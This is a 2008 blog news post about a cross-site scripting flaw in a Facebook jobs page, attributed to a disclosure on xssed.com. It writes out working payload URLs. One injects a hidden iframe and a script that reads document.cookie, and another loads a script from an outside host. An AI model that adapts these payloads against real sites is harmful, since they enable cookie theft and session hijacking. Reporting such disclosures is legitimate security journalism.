Tools 4 Facebook

This new vulnerability uses a XSS (Cross-Site Scripting) technique to obtain sensitive information from Facebook users and even allows to execute malicious script code on the user computer.

xssed.com who announced (author: Mox) that vulnerability give you good samples of how it works.

Redirection sample:

http://www.xssed.com/mirror/34274/

or

Insertion in a hidden iframe:

http://www.facebook.com/jobs/position.php?st=%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

According to Dimitris Pagkalos from xssed.com:

“I’m quite sure there are more cross-site scripting issues on Facebook. It is only a matter of time for the next one to be discovered by a security conscious individual.”

Source page

Other sources:

www.allfacebook.com

Tags: hack, Hack Facebook, News

Related Post

• Facebook hack: A New Vulnerability That Allows Novices to Stage Easy and Powerful Attacks
• Facebook Hack: How to See Tagged Photos from Anyone on Facebook
• Facebook Hack News: Maybe The Biggest Security Threat Facebook Has ever Faced - Its Homepage Source Code Publicly Revealed
• Facebook Hack: A Photo Looking Back at Your Credentials Exploit - GIFAR part I
• Facebook Hack: How to See Things From Friends You Shouldn’t
• Facebook Hacks: How to Hack Applications like Tetris Blockstar
• Facebook News (hack): XML Sitemaps & FBML? New Facebook Vulnerability? - Part 2 1st of April
• Facebook News (hack): XML Sitemaps & FBML? New Facebook Vulnerability?
• Facebook News: Facebook Nouveau Design Has Arrived
• Facebook News: Believe it or Not -The Ugliest Facebook Profile has Just Been Revealed
• Facebook News: Hackathon
• Facebook News: Protecting User Privacy by Example: Top Friends suspended
• Facebook News: Facebook in Number
• Facebook News: Experience Applications Without the need to install it
• Facebook News: Google’s “Friends Connect” suspended to Maintain User Privacy.
• Facebook News: The Improved Profile - Part IV
• Facebook Developers news: No More Support For the Official Java Client Library.
• Facebook News: Adobe Flash Player Updates May Affect Facebook Applications
• Facebook Video: How to Hack the Facebook “Moods” Application
• Facebook Hack: How to Easily Get Access to Limited Profile of Non-Friends
• Facebook News: Allocations to Email Sent From Applications to Users Feedback-based.
• Facebook News: Apps Development, Tutorials, News, Codes Samples, Hacks, …
• Facebook News: FAcebook JavaScript Library Has Been Updated.
• Facebook News: Platform Now Also Available to Users in Spanish, German and French.
• Facebook Hack Tutorial: How to Win $360,000/month on Facebook while sleeping.
• Facebook News: The Improved Profile - Part III
• Facebook Hack Tutorial: How to View Bigger Size Picture From Small Private Profiles Picture Without Losing in Resolution
• Facebook News: Victim of Their Success? - Part 2
• Facebook News: Victim of Their Success ?

May 22nd, 2008
Categories: Hack Facebook, News . Author: admin

No Comments

No comments yet.

Comments RSS TrackBack Identifier URI

Leave a comment

Name (required)

Mail (will not be published) (required)

Website